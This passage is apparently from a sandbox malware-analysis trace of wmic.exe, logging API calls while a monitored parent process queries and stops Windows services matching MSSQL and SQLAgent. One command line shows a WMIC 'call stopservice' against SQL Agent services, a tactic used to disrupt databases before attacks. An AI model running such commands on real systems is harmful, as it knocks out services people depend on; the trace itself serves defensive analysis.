returned 0x87cc28 [0258.114] malloc (_Size=0xc) returned 0x87ce80 [0258.115] malloc (_Size=0xc) returned 0x87cd00 [0258.115] WbemLocator:IWbemLocator:ConnectServer (in: This=0x4e48a8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x5407a8) returned 0x0 [0258.127] free (_Block=0x87cd00) [0258.127] free (_Block=0x87ce80) [0258.127] free (_Block=0x87cc28) [0258.127] CoSetProxyBlanket (pProxy=0x5407a8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0258.127] free (_Block=0x87cd78) [0258.127] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0258.128] ??0CHString@@QAE@XZ () returned 0x15fbc8 [0258.128] GetCurrentThreadId () returned 0x1010 [0258.128] malloc (_Size=0x38) returned 0x87c8f8 [0258.128] malloc (_Size=0x28) returned 0x87c938 [0258.129] malloc (_Size=0x28) returned 0x87c968 [0258.129] malloc (_Size=0x38) returned 0x87c998 [0258.129] malloc (_Size=0x38) returned 0x87c9d8 [0258.129] malloc (_Size=0x24) returned 0x87ca18 [0258.129] malloc (_Size=0xc) returned 0x87ab28 [0258.129] lstrlenA (lpString="") returned 0 [0258.129] malloc (_Size=0x2) returned 0x872ee8 [0258.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x872ee8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0258.129] free (_Block=0x872ee8) [0258.129] malloc (_Size=0x38) returned 0x87ca48 [0258.129] malloc (_Size=0x24) returned 0x87ca88 [0258.129] malloc (_Size=0xc) returned 0x87ab88 [0258.129] free (_Block=0x87ab28) [0258.129] IWbemServices:GetObject (in: This=0x5407a8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x15fba0*=0x0, ppCallResult=0x0 | out: ppObject=0x15fba0*=0x540300, ppCallResult=0x0) returned 0x0 [0258.188] malloc (_Size=0xc) returned 0x87ab28 [0258.188] IWbemClassObject:GetMethod (in: This=0x540300, wszName="stopservice", lFlags=0, ppInSignature=0x15fbbc, ppOutSignature=0x15fb9c | out: ppInSignature=0x15fbbc*=0x0, ppOutSignature=0x15fb9c*=0x543738) returned 0x0 [0258.188] free (_Block=0x87ab28) [0258.188] IUnknown:Release (This=0x543738) returned 0x0 [0258.188] IUnknown:Release (This=0x540300) returned 0x0 [0258.190] ??0CHString@@QAE@XZ () returned 0x15fa80 [0258.190] GetCurrentThreadId () returned 0x1010 [0258.190] malloc (_Size=0xc) returned 0x87ab28 [0258.190] lstrlenA (lpString="") returned 0 [0258.190] malloc (_Size=0x2) returned 0x872ee8 [0258.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x872ee8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0258.190] free (_Block=0x872ee8) [0258.190] malloc (_Size=0xc) returned 0x87aba0 [0258.190] lstrlenA (lpString="") returned 0 [0258.190] malloc (_Size=0x2) returned 0x872ee8 [0258.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x872ee8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0258.190] free (_Block=0x872ee8) [0258.190] malloc (_Size=0xc) returned 0x87abe8 [0258.190] free (_Block=0x87aba0) [0258.190] malloc (_Size=0xc) returned 0x87aba0 [0258.190] lstrlenA (lpString="SELECT * FROM ") returned 14 [0258.190] malloc (_Size=0x1e) returned 0x87cab8 [0258.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x87cab8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0258.190] free (_Block=0x87cab8) [0258.190] malloc (_Size=0xc) returned 0x879898 [0258.190] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0258.190] SysStringLen (param_1="Win32_Service") returned 0xd [0258.191] free (_Block=0x87aba0) [0258.191] malloc (_Size=0xc) returned 0x87aba0 [0258.191] malloc (_Size=0xc) returned 0x87ce98 [0258.191] lstrlenA (lpString=" WHERE ") returned 7 [0258.191] malloc (_Size=0x10) returned 0x87cdd8 [0258.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x87cdd8, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0258.191] free (_Block=0x87cdd8) [0258.191] malloc (_Size=0xc) returned 0x87cef8 [0258.191] SysStringLen (param_1=" WHERE ") returned 0x7 [0258.191] SysStringLen (param_1="name like '%%MSSQL%%'") returned 0x15 [0258.191] malloc (_Size=0xc) returned 0x87cd60 [0258.191] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0258.191] SysStringLen (param_1=" WHERE name like '%%MSSQL%%'") returned 0x1c [0258.191] free (_Block=0x879898) [0258.191] free (_Block=0x87cef8) [0258.191] free (_Block=0x87ce98) [0258.191] free (_Block=0x87aba0) [0258.191] malloc (_Size=0xc) returned 0x87ce68 [0258.191] IWbemServices:ExecQuery (in: This=0x5407a8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MSSQL%%'", lFlags=48, pCtx=0x0, ppEnum=0x15fa8c | out: ppEnum=0x15fa8c*=0x5440e8) returned 0x0 [0258.204] free (_Block=0x87ce68) [0258.204] CoSetProxyBlanket (pProxy=0x5440e8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0258.209] IEnumWbemClassObject:Next (in: This=0x5440e8, lTimeout=-1, uCount=0x1, apObjects=0x15fa88, puReturned=0x15fa78 | out: apObjects=0x15fa88*=0x0, puReturned=0x15fa78*=0x0) returned 0x1 [0275.000] IUnknown:Release (This=0x5440e8) returned 0x0 [0275.004] free (_Block=0x87cd60) [0275.004] free (_Block=0x87abe8) [0275.004] free (_Block=0x87ab28) [0275.004] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.005] free (_Block=0x87ab88) [0275.005] free (_Block=0x87ca18) [0275.005] free (_Block=0x87c9d8) [0275.005] free (_Block=0x87c998) [0275.005] free (_Block=0x87c968) [0275.005] free (_Block=0x87c938) [0275.005] free (_Block=0x87ca88) [0275.005] free (_Block=0x87ca48) [0275.005] free (_Block=0x87c8f8) [0275.005] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.005] GetCurrentThreadId () returned 0x1010 [0275.005] ??0CHString@@QAE@PBG@Z () returned 0x15fc40 [0275.005] ??YCHString@@QAEABV0@PBG@Z () returned 0x15fc40 [0275.005] malloc (_Size=0x800) returned 0x87d000 [0275.005] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x87d000, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0275.006] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0275.006] malloc (_Size=0x1c) returned 0x87c8f8 [0275.006] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x87c8f8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0275.006] __iob_func () returned 0x776f2608 [0275.006] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0275.007] __iob_func () returned 0x776f2608 [0275.007] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0275.009] free (_Block=0x87c8f8) [0275.009] free (_Block=0x87d000) [0275.009] ??1CHString@@QAE@XZ () returned 0x1 [0275.009] WbemLocator:IUnknown:Release (This=0x5407a8) returned 0x0 [0275.010] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0275.010] _kbhit () returned 0x0 [0275.017] free (_Block=0x87c108) [0275.017] free (_Block=0x87ac78) [0275.017] free (_Block=0x87ac48) [0275.017] free (_Block=0x87ad80) [0275.017] free (_Block=0x87ad50) [0275.017] free (_Block=0x87b048) [0275.017] free (_Block=0x87c0e0) [0275.017] free (_Block=0x879da8) [0275.017] free (_Block=0x87c150) [0275.017] free (_Block=0x87acd8) [0275.017] free (_Block=0x872c20) [0275.017] free (_Block=0x870520) [0275.017] free (_Block=0x87cbc8) [0275.017] free (_Block=0x87ad08) [0275.017] free (_Block=0x87ab10) [0275.017] free (_Block=0x87cb88) [0275.017] free (_Block=0x87cb48) [0275.017] free (_Block=0x87ade0) [0275.017] free (_Block=0x87ac00) [0275.017] free (_Block=0x87adf8) [0275.017] free (_Block=0x87cb18) [0275.017] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0275.017] free (_Block=0x87b730) [0275.017] free (_Block=0x87ac90) [0275.018] free (_Block=0x870568) [0275.018] free (_Block=0x87ad98) [0275.018] free (_Block=0x87c118) [0275.018] free (_Block=0x87acf0) [0275.018] free (_Block=0x872b20) [0275.018] free (_Block=0x8726b0) [0275.018] free (_Block=0x8726f8) [0275.018] free (_Block=0x872740) [0275.018] free (_Block=0x87ab70) [0275.018] free (_Block=0x8727c8) [0275.018] free (_Block=0x870508) [0275.018] free (_Block=0x872ca0) [0275.018] free (_Block=0x8704f0) [0275.018] free (_Block=0x872ba0) [0275.018] free (_Block=0x8704d8) [0275.018] free (_Block=0x872a60) [0275.018] free (_Block=0x872908) [0275.018] free (_Block=0x872920) [0275.018] free (_Block=0x8728d0) [0275.018] free (_Block=0x8728e8) [0275.018] free (_Block=0x872940) [0275.018] free (_Block=0x872958) [0275.019] free (_Block=0x8704a0) [0275.019] free (_Block=0x8704b8) [0275.019] free (_Block=0x872860) [0275.019] free (_Block=0x872878) [0275.019] free (_Block=0x872828) [0275.019] free (_Block=0x872840) [0275.019] free (_Block=0x872898) [0275.019] free (_Block=0x8728b0) [0275.019] free (_Block=0x8727f0) [0275.019] free (_Block=0x872808) [0275.019] free (_Block=0x8727a0) [0275.019] free (_Block=0x8711f8) [0275.019] free (_Block=0x87afc0) [0275.019] WbemLocator:IUnknown:Release (This=0x4e48a8) returned 0x2 [0275.019] WbemLocator:IUnknown:Release (This=0x4eae98) returned 0x0 [0275.020] WbemLocator:IUnknown:Release (This=0x4e48a8) returned 0x1 [0275.020] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0275.020] WbemLocator:IUnknown:Release (This=0x4e48a8) returned 0x0 [0275.020] free (_Block=0x87ac60) [0275.020] free (_Block=0x87ad38) [0275.020] free (_Block=0x872c00) [0275.021] free (_Block=0x87acc0) [0275.021] free (_Block=0x87adc8) [0275.021] free (_Block=0x8729e0) [0275.021] free (_Block=0x87ae40) [0275.021] free (_Block=0x87aea0) [0275.021] free (_Block=0x872d40) [0275.021] free (_Block=0x87abb8) [0275.021] free (_Block=0x87ab58) [0275.021] free (_Block=0x8729a0) [0275.021] free (_Block=0x87aeb8) [0275.021] free (_Block=0x87aed0) [0275.021] free (_Block=0x872ae0) [0275.021] free (_Block=0x87ae70) [0275.021] free (_Block=0x87ae10) [0275.021] free (_Block=0x872ce0) [0275.021] free (_Block=0x87ad68) [0275.021] free (_Block=0x87ac30) [0275.021] free (_Block=0x872b80) [0275.021] free (_Block=0x87ad20) [0275.021] free (_Block=0x87ab40) [0275.021] free (_Block=0x872be0) [0275.021] free (_Block=0x879880) [0275.021] free (_Block=0x87ae28) [0275.022] free (_Block=0x872a20) [0275.022] free (_Block=0x87ae88) [0275.022] free (_Block=0x87ae58) [0275.022] free (_Block=0x872a80) [0275.022] free (_Block=0x87ac18) [0275.022] free (_Block=0x87abd0) [0275.022] free (_Block=0x872b60) [0275.022] free (_Block=0x87adb0) [0275.022] free (_Block=0x87aca8) [0275.022] free (_Block=0x8729c0) [0275.022] free (_Block=0x8798c8) [0275.022] free (_Block=0x8798f8) [0275.022] free (_Block=0x872cc0) [0275.022] free (_Block=0x8798b0) [0275.022] free (_Block=0x8797f0) [0275.022] free (_Block=0x872c80) [0275.022] free (_Block=0x879928) [0275.022] free (_Block=0x879808) [0275.022] free (_Block=0x872d00) [0275.022] free (_Block=0x879970) [0275.023] free (_Block=0x879988) [0275.023] free (_Block=0x872d60) [0275.023] free (_Block=0x8799b8) [0275.023] free (_Block=0x879850) [0275.023] free (_Block=0x872ac0) [0275.023] free (_Block=0x879820) [0275.023] free (_Block=0x8798e0) [0275.023] free (_Block=0x872bc0) [0275.023] free (_Block=0x879940) [0275.023] free (_Block=0x879838) [0275.023] free (_Block=0x872aa0) [0275.023] free (_Block=0x879910) [0275.023] free (_Block=0x8799a0) [0275.023] free (_Block=0x872d20) [0275.023] free (_Block=0x879868) [0275.023] free (_Block=0x879958) [0275.023] free (_Block=0x872a00) [0275.023] CoUninitialize () [0275.069] exit (_Code=0) [0275.070] free (_Block=0x87aee8) [0275.070] free (_Block=0x871000) [0275.070] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.070] free (_Block=0x872e10) [0275.070] free (_Block=0x8727e0) [0275.070] free (_Block=0x870fe0) [0275.070] free (_Block=0x870fc0) [0275.070] free (_Block=0x870f90) [0275.070] free (_Block=0x870f70) [0275.070] free (_Block=0x870f40) [0275.070] free (_Block=0x870f00) [0275.070] free (_Block=0x870ee0) [0275.070] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.070] free (_Block=0x872a40) Thread: id = 214 os_tid = 0x108c Thread: id = 215 os_tid = 0x12d8 Thread: id = 216 os_tid = 0x12d0 Thread: id = 217 os_tid = 0x12cc Process: id = "16" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x22568000" os_pid = "0x1220" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 224 os_tid = 0x1228 [0275.317] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0275.317] __set_app_type (_Type=0x1) [0275.317] __p__fmode () returned 0x776f3c14 [0275.317] __p__commode () returned 0x776f49ec [0275.317] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0275.318] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0275.318] ??0CHString@@QAE@XZ () returned 0xa685ec [0275.318] malloc (_Size=0x18) returned 0x790ee8 [0275.318] malloc (_Size=0x38) returned 0x790f08 [0275.318] malloc (_Size=0x28) returned 0x790f48 [0275.318] malloc (_Size=0x18) returned 0x790f78 [0275.319] malloc (_Size=0x24) returned 0x790f98 [0275.319] malloc (_Size=0x18) returned 0x790fc8 [0275.319] malloc (_Size=0x18) returned 0x790fe8 [0275.319] ??0CHString@@QAE@XZ () returned 0xa688fc [0275.319] malloc (_Size=0x18) returned 0x791008 [0275.319] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0275.319] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0275.319] _onexit (_Func=0xa5f370) returned 0xa5f370 [0275.319] _onexit (_Func=0xa5f380) returned 0xa5f380 [0275.319] _onexit (_Func=0xa5f390) returned 0xa5f390 [0275.320] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0275.320] ResolveDelayLoadedAPI () returned 0x74a22590 [0275.320] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0275.326] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0275.337] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x5348d0) returned 0x0 [0275.362] GetCurrentProcess () returned 0xffffffff [0275.362] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1dfac0 | out: TokenHandle=0x1dfac0*=0x194) returned 1 [0275.362] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1dfabc | out: TokenInformation=0x0, ReturnLength=0x1dfabc) returned 0 [0275.362] malloc (_Size=0x118) returned 0x7926b0 [0275.362] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x7926b0, TokenInformationLength=0x118, ReturnLength=0x1dfabc | out: TokenInformation=0x7926b0, ReturnLength=0x1dfabc) returned 1 [0275.363] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x7926b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0275.363] free (_Block=0x7926b0) [0275.363] CloseHandle (hObject=0x194) returned 1 [0275.363] malloc (_Size=0x40) returned 0x7926b0 [0275.363] malloc (_Size=0x40) returned 0x7926f8 [0275.363] malloc (_Size=0x40) returned 0x792740 [0275.363] SetThreadUILanguage (LangId=0x0) returned 0x270409 [0275.367] _vsnwprintf (in: _Buffer=0x792740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1dfa48 | out: _Buffer="ms_409") returned 6 [0275.367] malloc (_Size=0x20) returned 0x791200 [0275.367] GetComputerNameW (in: lpBuffer=0x791200, nSize=0x1dfaac | out: lpBuffer="NQDPDE", nSize=0x1dfaac) returned 1 [0275.367] lstrlenW (lpString="NQDPDE") returned 6 [0275.367] malloc (_Size=0xe) returned 0x792788 [0275.367] lstrlenW (lpString="NQDPDE") returned 6 [0275.367] ResolveDelayLoadedAPI () returned 0x7444db00 [0275.368] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1dfac0 | out: lpNameBuffer=0x0, nSize=0x1dfac0) returned 0x273000 [0275.369] GetLastError () returned 0xea [0275.370] malloc (_Size=0x1e) returned 0x7927a0 [0275.370] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7927a0, nSize=0x1dfac0 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x1dfac0) returned 0x1 [0275.370] lstrlenW (lpString="") returned 0 [0275.370] lstrlenW (lpString="NQDPDE") returned 6 [0275.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0275.373] lstrlenW (lpString=".") returned 1 [0275.373] lstrlenW (lpString="NQDPDE") returned 6 [0275.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0275.373] lstrlenW (lpString="LOCALHOST") returned 9 [0275.373] lstrlenW (lpString="NQDPDE") returned 6 [0275.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0275.373] lstrlenW (lpString="NQDPDE") returned 6 [0275.373] lstrlenW (lpString="NQDPDE") returned 6 [0275.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0275.374] free (_Block=0x792788) [0275.374] lstrlenW (lpString="NQDPDE") returned 6 [0275.374] malloc (_Size=0xe) returned 0x792788 [0275.374] lstrlenW (lpString="NQDPDE") returned 6 [0275.374] lstrlenW (lpString="NQDPDE") returned 6 [0275.374] malloc (_Size=0xe) returned 0x7927c8 [0275.374] lstrlenW (lpString="NQDPDE") returned 6 [0275.374] malloc (_Size=0x4) returned 0x7927e0 [0275.374] malloc (_Size=0xc) returned 0x7927f0 [0275.374] ResolveDelayLoadedAPI () returned 0x7745b870 [0275.386] malloc (_Size=0x18) returned 0x792808 [0275.386] malloc (_Size=0xc) returned 0x792828 [0275.387] SysStringLen (param_1="IDENTIFY") returned 0x8 [0275.387] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0275.387] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0275.387] SysStringLen (param_1="IDENTIFY") returned 0x8 [0275.387] malloc (_Size=0x18) returned 0x792840 [0275.387] malloc (_Size=0xc) returned 0x792860 [0275.387] SysStringLen (param_1="IMPERSONATE") returned 0xb [0275.387] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0275.387] SysStringLen (param_1="IMPERSONATE") returned 0xb [0275.387] SysStringLen (param_1="IDENTIFY") returned 0x8 [0275.387] SysStringLen (param_1="IDENTIFY") returned 0x8 [0275.387] SysStringLen (param_1="IMPERSONATE") returned 0xb [0275.387] malloc (_Size=0x18) returned 0x792878 [0275.387] malloc (_Size=0xc) returned 0x792898 [0275.387] SysStringLen (param_1="DELEGATE") returned 0x8 [0275.387] SysStringLen (param_1="IDENTIFY") returned 0x8 [0275.387] SysStringLen (param_1="DELEGATE") returned 0x8 [0275.387] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0275.387] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0275.387] SysStringLen (param_1="DELEGATE") returned 0x8 [0275.387] malloc (_Size=0x18) returned 0x7928b0 [0275.387] malloc (_Size=0xc) returned 0x7928d0 [0275.387] malloc (_Size=0x18) returned 0x7928e8 [0275.388] malloc (_Size=0xc) returned 0x792908 [0275.388] SysStringLen (param_1="NONE") returned 0x4 [0275.388] SysStringLen (param_1="DEFAULT") returned 0x7 [0275.388] SysStringLen (param_1="DEFAULT") returned 0x7 [0275.388] SysStringLen (param_1="NONE") returned 0x4 [0275.388] malloc (_Size=0x18) returned 0x792920 [0275.388] malloc (_Size=0xc) returned 0x792940 [0275.388] SysStringLen (param_1="CONNECT") returned 0x7 [0275.388] SysStringLen (param_1="DEFAULT") returned 0x7 [0275.388] malloc (_Size=0x18) returned 0x792958 [0275.388] malloc (_Size=0xc) returned 0x7904a0 [0275.389] SysStringLen (param_1="CALL") returned 0x4 [0275.389] SysStringLen (param_1="DEFAULT") returned 0x7 [0275.389] SysStringLen (param_1="CALL") returned 0x4 [0275.389] SysStringLen (param_1="CONNECT") returned 0x7 [0275.389] malloc (_Size=0x18) returned 0x7904b8 [0275.389] malloc (_Size=0xc) returned 0x7904d8 [0275.389] SysStringLen (param_1="PKT") returned 0x3 [0275.389] SysStringLen (param_1="DEFAULT") returned 0x7 [0275.389] SysStringLen (param_1="PKT") returned 0x3 [0275.389] SysStringLen (param_1="NONE") returned 0x4 [0275.389] SysStringLen (param_1="NONE") returned 0x4 [0275.389] SysStringLen (param_1="PKT") returned 0x3 [0275.389] malloc (_Size=0x18) returned 0x7929c0 [0275.389] malloc (_Size=0xc) returned 0x7904f0 [0275.389] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0275.389] SysStringLen (param_1="DEFAULT") returned 0x7 [0275.389] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0275.389] SysStringLen (param_1="NONE") returned 0x4 [0275.389] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0275.389] SysStringLen (param_1="PKT") returned 0x3 [0275.389] SysStringLen (param_1="PKT") returned 0x3 [0275.390] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0275.390] malloc (_Size=0x18) returned 0x792c20 [0275.390] malloc (_Size=0xc) returned 0x790508 [0275.390] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0275.390] SysStringLen (param_1="DEFAULT") returned 0x7 [0275.390] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0275.390] SysStringLen (param_1="PKT") returned 0x3 [0275.390] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0275.390] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0275.390] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0275.390] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0275.390] malloc (_Size=0x18) returned 0x792ce0 [0275.390] malloc (_Size=0x40) returned 0x790520 [0275.390] malloc (_Size=0x20a) returned 0x7997c8 [0275.390] GetSystemDirectoryW (in: lpBuffer=0x7997c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0275.390] free (_Block=0x7997c8) [0275.390] malloc (_Size=0xc) returned 0x790568 [0275.390] malloc (_Size=0xc) returned 0x790580 [0275.390] malloc (_Size=0xc) returned 0x792d80 [0275.390] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0275.390] SysStringLen (param_1="\\wbem\\") returned 0x6 [0275.391] free (_Block=0x790568) [0275.391] free (_Block=0x790580) [0275.391] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0275.391] free (_Block=0x792d80) [0275.391] malloc (_Size=0xc) returned 0x7998f8 [0275.391] malloc (_Size=0xc) returned 0x799910 [0275.391] malloc (_Size=0xc) returned 0x799940 [0275.391] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0275.391] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0275.391] free (_Block=0x7998f8) [0275.391] free (_Block=0x799910) [0275.391] GetCurrentThreadId () returned 0x1228 [0275.392] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1df5d0 | out: phkResult=0x1df5d0*=0x1a0) returned 0x0 [0275.392] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1df5dc, lpcbData=0x1df5d8*=0x400 | out: lpType=0x0, lpData=0x1df5dc*=0x30, lpcbData=0x1df5d8*=0x4) returned 0x0 [0275.392] _wcsicmp (_String1="0", _String2="1") returned -1 [0275.392] _wcsicmp (_String1="0", _String2="2") returned -2 [0275.392] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, 